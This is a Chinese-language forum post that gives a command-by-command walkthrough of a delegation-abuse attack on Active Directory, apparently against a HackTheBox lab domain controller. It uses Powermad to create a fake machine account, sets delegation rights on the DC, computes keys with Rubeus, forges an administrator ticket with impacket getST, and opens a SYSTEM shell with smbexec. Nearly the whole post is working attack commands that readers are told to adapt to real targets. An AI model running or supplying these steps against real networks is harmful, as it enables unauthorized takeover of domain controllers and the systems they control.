kali之约束委派攻击

打印 上一主题 下一主题

主题 911|帖子 911|积分 2733

用到的工具

Powermad.ps1:https://github.com/Kevin-Robertson/Powermad
Rubeus.exe:https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
impacket工具包:https://github.com/fortra/impacket
Evil-Winrm : Winrm Pentesting Framework(远程渗透管理工具)
安装:gem install evil-winrm
约束委派攻击

前提:通过Evil-Winrm工具获取到目标机器的普通权限
注意:(以下命令参数值根据实际情况进行修改)
上传提权所用的文件到目标机
  1. upload /root/Desktop/kerberos/Powermad/Powermad.ps1
  2. upload /root/Desktop/kerberos/Ghostpack-CompiledBinaries/Rubeus.exe
  3. Import-Module ./Powermad.ps1  # 导入模块命令
复制代码
  1. # 设置参数
  2. Set-Variable -Name "FakePC" -Value "FAKE01"  # FAKE01这个名字可以自己改
  3. Set-Variable -Name "targetComputer" -Value "DC"
复制代码

创建一个新用户(执行如下命令,会创建一个FAKE01用户)
New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
  1. # 设置权限
  2. Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')
  3. # 检查是否工作
  4. Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount
复制代码

生成hash,aes256
./Rubeus.exe hash /password:123456 /user:FAKE01$ /domain:support.htb

kali执行如下(根据实际情况进行修改)
  1. # 添加hosts文件
  2. echo "10.10.11.174 support.htb" >> /etc/hosts
  3. echo "10.10.11.174 dc.support.htb" >> /etc/hosts
  4. # 生成TGT票据
  5. python3 getST.py support.htb/FAKE01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B
  6. # 添加票据
  7. export KRB5CCNAME=administrator.ccache
  8. # 连接机器
  9. smbexec.py support.htb/administrator@dc.support.htb -no-pass -k
复制代码
成功获取系统权限


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

用户云卷云舒

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表